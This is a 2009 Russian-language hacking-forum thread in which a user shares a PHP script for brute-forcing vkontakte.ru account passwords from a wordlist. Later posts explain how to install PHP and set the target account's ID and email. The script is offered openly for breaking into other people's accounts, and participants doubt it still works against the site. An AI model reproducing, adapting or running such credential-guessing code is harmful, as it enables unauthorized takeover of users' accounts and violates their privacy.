PDA

Просмотр полной версии : Мой скрипт для брута vkontakte.ru


herfleisch
10.01.2009, 18:43
Скрипт был написан ещё летом - тогда он брутил на ура. На счёт сейчас я ничего не могу сказать. Капча вроде как теперь действует и на заглавной странице сайта при возврате назад восле неверного ввода пароля... Но тем не менее вот скрипт - кому надо, берите, дорабатывайте, говорите спасибо или говорите какой я м*удак.



#!/usr/bin/php
<? $i = 0;
// Please change this information
$id = '12345678';
$username = 'user%40mail.ru';
$passlist = 'file.txt';
function checklogin($id, $username, $password)
{
$socketforconnect = socket_create(AF_INET, SOCK_STREAM, 0);
socket_connect($socketforconnect, gethostbyname("vkontakte.ru"), 80);
$md5 = md5($password);
$data = "HEAD http://vkontakte.ru/ HTTP/1.0\r\nGET http://www.vkontakte.ru/login.php?email=$username&pass=$password HTTP/1.0\r\nHost: vkontakte.ru\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozillo\r\nCookie: remixchk=2; remixmid=$id; remixemail=$username; remixpass=$md5\r\nConnection: close\r\n\r\n"; socket_write($socketforconnect, $data, strlen($data));

$data = socket_read($socketforconnect, 1000, PHP_BINARY_READ);
if (strlen($data) == 423)
return 0;
else return 1;
}

$filedes = fopen($passlist, "r");
rewind($filedes);
print("User ID: $id\nSearch for password from file $passlist\n");

do
{
$password = fgetss($filedes, 16);
$password = substr($password, 0, -1);
$i++;
if ($password == '')
{
print("\rPassword is not found\n");
exit;
}
print("\r$i");
$result = checklogin($id, $username, $password);
if ($result == 1)
{
print("\nSearch completed!\n");
break;
}

}

while (true);
fclose($filedes);

?>

herfleisch
10.01.2009, 18:51
Уже нашёл ещё одну вещь в скрипте, которая сегодня уже тоже не работает...

xMaVRiKx
11.01.2009, 15:07
а как его использовать?)))

herfleisch
11.01.2009, 15:11
Копировать в текстовый файл, ввести chmod +x brute.php, подставить нужные значения в переменные и ждать счастья.

P.S. я же сказал, что сегодня он скорее всего работать не будет, его нужно доработать, хотя чем чёрт не шутит - авось до сих пор работает...

Don1=2
11.01.2009, 15:11
использование: правой кнопкой, удалить.(тебе ясно сказали что скрипт не пашет)
нечего дорабатывать, он не заработает.

з.ы. скажи "мда...ты петросян"

xMaVRiKx
11.01.2009, 15:12
мда...ты петросян

xMaVRiKx
11.01.2009, 15:13
Копировать в текстовый файл, ввести chmod +x brute.php, подставить нужные значения в переменные и ждать счастья.

P.S. я же сказал, что сегодня он скорее всего работать не будет, его нужно доработать, хотя чем чёрт не шутит - авось до сих пор работает...
шото я несовсем понял)))

herfleisch
11.01.2009, 15:18
Что именно не понятно?

xMaVRiKx
11.01.2009, 15:25
ну как его запустить

herfleisch
11.01.2009, 15:30
Может быть не стоит тогда этим заниматься? СХодить покурить другие темы... или поюзать гугл?

xMaVRiKx
11.01.2009, 15:32
я гугл юзал не помогло...

herfleisch
12.01.2009, 01:44
я гугл юзал не помогло...
Блин, ставь интерпретатор языка PHP и будет тебе счастье! Без него никак =))

herfleisch
12.01.2009, 01:52
Да, хорошо понимаю тебя...

Интерпретатор PHP качай здесь:
http://ru2.php.net/get/php-5.2.8-win32-installer.msi/from/this/mirror

При установке он спросит тип web-сервера (увидишь слова APACHE, Other CGI или что-то типа того и много вариантов для выбора типа сервера) - там выбери самый последний, который означает "не устанавливать никакого", он тебе нафиг не нужен.
После этого установи для файлов "*.php" программу по умолчанию: "c:\Program Files\PHP\php.exe" и запускай скрипт из консоли.

В самом скрипте укажи в качестве значений переменных ID взламываемого акка, почтовый ящик и имя файла с паролями.